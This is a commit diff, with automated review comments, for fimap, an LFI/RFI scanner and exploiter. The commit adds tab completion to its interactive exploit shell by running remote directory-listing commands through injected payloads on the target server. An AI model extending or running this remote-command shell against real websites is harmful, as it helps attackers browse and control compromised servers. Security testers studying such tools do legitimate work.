Commit b3377d4d authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com

Added tab completion for exploit mode.

parent e7353746
...@@ -180,15 +180,56 @@ class codeinjector(baseClass): ...@@ -180,15 +180,56 @@ class codeinjector(baseClass):
if (type(attack) == str): if (type(attack) == str):
if (attack == "fimap_shell"): if (attack == "fimap_shell"):
tab_choice = []
ls_cmd = None
def complete(txt, state):
for tab in tab_choice:
if tab.startswith(txt):
if not state: return tab
else: state -= 1
if (self.config["p_tabcomplete"]):
self._log("Setting up tab-completation...", self.LOG_DEBUG)
try:
import readline
readline.parse_and_bind("tab: complete")
readline.set_completer(complete)
if (isUnix):
ls_cmd = "ls -m"
else:
ls_cmd = "dir"
except:
self._log("Failed to setup readline module!", self.LOG_WARN)
self._log("Falling back to default exploit-shell.", self.LOG_WARN)
cmd = "" cmd = ""
print "Please wait - Setting up shell (one request)..." print "Please wait - Setting up shell (one request)..."
#pwd_cmd = item.generatePayload("pwd;whoami") #pwd_cmd = item.generatePayload("pwd;whoami")
commands = (xml2config.getCurrentDirCode(isUnix), xml2config.getCurrentUserCode(isUnix))
commands = [xml2config.getCurrentDirCode(isUnix), xml2config.getCurrentUserCode(isUnix)]
if (ls_cmd != None):
commands.append(ls_cmd)
pwd_cmd = item.generatePayload(xml2config.concatCommands(commands, isUnix)) pwd_cmd = item.generatePayload(xml2config.concatCommands(commands, isUnix))
tmp = self.__doHaxRequest(url, postdata, mode, pwd_cmd, langClass, suffix).strip() tmp = self.__doHaxRequest(url, postdata, mode, pwd_cmd, langClass, suffix).strip()
curdir = tmp.split("\n")[0].strip() curdir = tmp.split("\n")[0].strip()
curusr = tmp.split("\n")[1].strip() curusr = tmp.split("\n")[1].strip()
if (ls_cmd != None):
dir_content = ",".join(tmp.split("\n")[2:])
tab_choice = []
for c in dir_content.split(","):
c = c.strip()
if (c != ""):
tab_choice.append(c)
if (curusr) == "": if (curusr) == "":
curusr = "fimap" curusr = "fimap"
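Review bot: The bare `except:` around the readline setup swallows every exception, including KeyboardInterrupt and SystemExit, so a Ctrl-C during setup is misreported as "Failed to setup readline module!"; the only failures this block expects are the import and the readline calls, so `except ImportError:` (or `except (ImportError, AttributeError):`) names what is actually handled and keeps interrupts working. The enclosing method starts before this hunk and continues past it. The completion cache is filled at the end of this hunk and again in the next hunk with the same strip-and-filter loop over a comma-joined string; a small private helper such as `def _parseTabCache(text): return [c.strip() for c in text.split(",") if c.strip()]` would remove the duplication, and in the next hunk the `if (ls_cmd != None)` test is repeated directly inside its own body. The `complete` callback also deserves a one-line docstring stating that it is the readline completer returning the state-th entry of `tab_choice` that starts with `txt`, since nothing else in the block explains why it is defined before the shell loop.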
...@@ -205,10 +246,27 @@ class codeinjector(baseClass): ...@@ -205,10 +246,27 @@ class codeinjector(baseClass):
userload = item.generatePayload(cmds) userload = item.generatePayload(cmds)
code = self.__doHaxRequest(url, postdata, mode, userload, langClass, suffix) code = self.__doHaxRequest(url, postdata, mode, userload, langClass, suffix)
if (cmd.startswith("cd ")): if (cmd.startswith("cd ")):
# Get Current Directory...
commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd, xml2config.getCurrentDirCode(isUnix)) commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd, xml2config.getCurrentDirCode(isUnix))
cmds = xml2config.concatCommands(commands, isUnix) cmds = xml2config.concatCommands(commands, isUnix)
cmd = item.generatePayload(cmds) cmd = item.generatePayload(cmds)
curdir = self.__doHaxRequest(url, postdata, mode, cmd, langClass, suffix).strip() curdir = self.__doHaxRequest(url, postdata, mode, cmd, langClass, suffix).strip()
# Refresh Tab-Complete Cache...
if (ls_cmd != None):
self._log("Refreshing Tab-Completation cache...", self.LOG_DEBUG)
commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), ls_cmd)
cmds = xml2config.concatCommands(commands, isUnix)
cmd = item.generatePayload(cmds)
tab_cache = self.__doHaxRequest(url, postdata, mode, cmd, langClass, suffix).strip()
if (ls_cmd != None):
dir_content = ",".join(tab_cache.split("\n"))
tab_choice = []
for c in dir_content.split(","):
c = c.strip()
if (c != ""):
tab_choice.append(c)
print code.strip() print code.strip()
except KeyboardInterrupt: except KeyboardInterrupt:
print "\nCancelled by user." print "\nCancelled by user."
...@@ -40,7 +40,8 @@ __version__ = "09_svn" ...@@ -40,7 +40,8 @@ __version__ = "09_svn"
config = {} config = {}
head = "fimap v.%s by Iman Karim - Automatic LFI/RFI scanner and exploiter"%__version__ head = "\nfimap v.%s by Iman Karim (fimap.dev@gmail.com)\n"%__version__ +\
"~ Automatic LFI/RFI scanner and exploiter ~\n"
pluginlist = "http://fimap.googlecode.com/svn/wiki/PluginList.wiki" pluginlist = "http://fimap.googlecode.com/svn/wiki/PluginList.wiki"
defupdateurl = "http://fimap.googlecode.com/svn/trunk/src/config/" defupdateurl = "http://fimap.googlecode.com/svn/trunk/src/config/"
...@@ -100,6 +101,7 @@ def show_help(AndQuit=False): ...@@ -100,6 +101,7 @@ def show_help(AndQuit=False):
print "## Attack Kit:" print "## Attack Kit:"
print " -x , --exploit Starts an interactive session where you can" print " -x , --exploit Starts an interactive session where you can"
print " select a target and do some action." print " select a target and do some action."
print " -T , --tab-complete Enables TAB-Completation in exploit mode. Needs readline module."
print "## Disguise Kit:" print "## Disguise Kit:"
print " -A , --user-agent=UA The User-Agent which should be sent." print " -A , --user-agent=UA The User-Agent which should be sent."
print " --http-proxy=PROXY Setup your proxy with this option. But read this facts:" print " --http-proxy=PROXY Setup your proxy with this option. But read this facts:"
...@@ -160,10 +162,13 @@ def show_greetings(): ...@@ -160,10 +162,13 @@ def show_greetings():
print " - Exorzist" print " - Exorzist"
print " - IngoWer" print " - IngoWer"
print " - Invisible" print " - Invisible"
print " - MarcosKhan"
print " - Rita"
print " - Ruun" print " - Ruun"
print " - Sticks"
print " - Satyros"
print " - Yasmin" print " - Yasmin"
print " Special Greetings to the whole Netherlands" print " Special Greetings to the whole Netherlands"
print "## You guys and lads are epic."
sys.exit(0) sys.exit(0)
def show_ip(): def show_ip():
...@@ -222,7 +227,8 @@ if __name__ == "__main__": ...@@ -222,7 +227,8 @@ if __name__ == "__main__":
config["p_color"] = False config["p_color"] = False
config["p_mergexml"] = None config["p_mergexml"] = None
config["p_results_per_query"] = 100 config["p_results_per_query"] = 100
config["p_googlesleep"] = 5; config["p_googlesleep"] = 5;
config["p_tabcomplete"] = False;
doPluginsShow = False doPluginsShow = False
doRFITest = False doRFITest = False
doInternetInfo = False doInternetInfo = False
...@@ -244,8 +250,8 @@ if __name__ == "__main__": ...@@ -244,8 +250,8 @@ if __name__ == "__main__":
"show-my-ip" , "enable-blind", "http-proxy=" , "ttl=" , "post=" , "no-auto-detect", "show-my-ip" , "enable-blind", "http-proxy=" , "ttl=" , "post=" , "no-auto-detect",
"plugins" , "enable-color", "update-def" , "merge-xml=" , "install-plugins" , "results=", "plugins" , "enable-color", "update-def" , "merge-xml=" , "install-plugins" , "results=",
"googlesleep=" , "dot-truncation", "dot-trunc-min=", "dot-trunc-max=", "dot-trunc-step=", "dot-trunc-ratio=", "googlesleep=" , "dot-truncation", "dot-trunc-min=", "dot-trunc-max=", "dot-trunc-step=", "dot-trunc-ratio=",
"dot-trunc-also-unix"] "tab-complete" , "dot-trunc-also-unix"]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CID", longSwitches) optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CIDT", longSwitches)
startExploiter = False startExploiter = False
...@@ -325,6 +331,8 @@ if __name__ == "__main__": ...@@ -325,6 +331,8 @@ if __name__ == "__main__":
config["p_dot_trunc_ratio"] = float(v) config["p_dot_trunc_ratio"] = float(v)
if (k in ("--dot-trunc-also-unix",)): if (k in ("--dot-trunc-also-unix",)):
config["p_dot_trunc_only_win"] = False config["p_dot_trunc_only_win"] = False
if (k in ("-T", "--tab-complete")):
config["p_tabcomplete"] = True
#if (k in("-f", "--exploit-filter")): #if (k in("-f", "--exploit-filter")):
# config["p_exploit_filter"] = v # config["p_exploit_filter"] = v
...@@ -335,7 +343,11 @@ if __name__ == "__main__": ...@@ -335,7 +343,11 @@ if __name__ == "__main__":
config["PLUGINMANAGER"] = plugman config["PLUGINMANAGER"] = plugman
if startExploiter: if startExploiter:
list_results() try:
list_results()
except KeyboardInterrupt:
print "\n\nYou killed me brutally. Wtf!\n\n"
sys.exit(0)
except getopt.GetoptError, err: except getopt.GetoptError, err:
print (err) print (err)
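Review bot: The new help line prints the misspelling "TAB-Completation" to the user; it should read `print "  -T , --tab-complete   Enables TAB completion in exploit mode. Needs readline module."` (the same spelling appears in the new log messages in the codeinjector hunks). The added default `config["p_tabcomplete"] = False;` ends with a trailing semicolon that the rest of the config block does not use (only the googlesleep line above shares it); drop it for consistency. The short switch `T` added to the getopt string, the `tab-complete` long switch and the handler that sets `p_tabcomplete` are consistent with each other, and the new try/except around `list_results()` only catches KeyboardInterrupt, which is the right narrow scope.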